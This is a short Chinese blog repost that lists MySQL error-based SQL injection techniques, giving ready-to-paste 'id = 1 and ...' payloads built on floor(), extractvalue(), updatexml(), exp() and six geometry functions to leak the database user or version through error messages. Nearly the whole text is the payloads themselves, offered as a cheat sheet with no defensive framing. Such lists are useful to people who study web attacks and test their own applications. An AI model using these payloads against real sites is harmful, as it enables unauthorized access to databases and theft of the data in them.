码迷,mamicode.com
首页 > 数据库 > 详细

关于SQL注入的五大报错注入函数

时间:2016-05-14 23:13:45      阅读:432      评论:0      收藏:0      [点我收藏+]

标签:

~全部都以查user()为例子~

1.floor()
id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)
技术分享

2.extractvalue()
id = 1 and (extractvalue(1, concat(0x5c,(select user()))))

技术分享

3.updatexml()
id = 1 and (updatexml(0x3a,concat(1,(select user())),1))
技术分享

4.exp()
id =1 and EXP(~(SELECT * from(select user())a))

技术分享

5.有六种函数(但总的来说可以归为一类)

GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))

polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))

multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))

multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))

linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))

技术分享

关于SQL注入的五大报错注入函数

标签:

原文地址:http://www.cnblogs.com/Dleo/p/5493782.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!